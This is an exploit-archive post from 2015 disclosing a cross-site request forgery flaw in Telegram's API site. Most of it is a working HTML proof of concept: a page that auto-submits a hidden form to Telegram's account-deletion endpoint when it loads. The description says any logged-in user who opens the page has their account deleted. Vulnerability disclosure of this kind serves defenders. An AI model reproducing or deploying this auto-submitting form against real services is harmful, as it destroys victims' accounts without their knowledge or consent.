Home / os / blackberry
Telegram API CSRF
Posted on 06 July 2015
/*********************************************************************************** ** Exploit Title: Telegram API Cross Site Request Forgery ** ** Exploit Author: C4T ** ** Vendor Homepage : http://my.telegram.org ** ** Google Dork: none ** ** Date: 06/27/2015 ** ** Tested on: Windows 7 ** ************************************************************************************ ** Exploit Code: ****************** <body onload="document.exploit.submit()"> <form name="exploit" action="https://my.telegram.org/deactivate/do_delete" id="deactivate_phone_form" onsubmit="return sendPassword(event);"> <input type="hidden" name="message" value="ExploitedByC4T"> </form> ************************************************************************************* ** Description: ****************** when a user is logging in telegram API just by openning a web page containing this exploit his account will be deleted. Discovered by C4T @ Ashiyane Digital Security Team. ------------------------------------------------------- ****************************************************************************************** ** ** More Details and Explanation: ** ** http://hatrhyme.com/CSRFInTelegram.pdf ** ******************************************************************************************
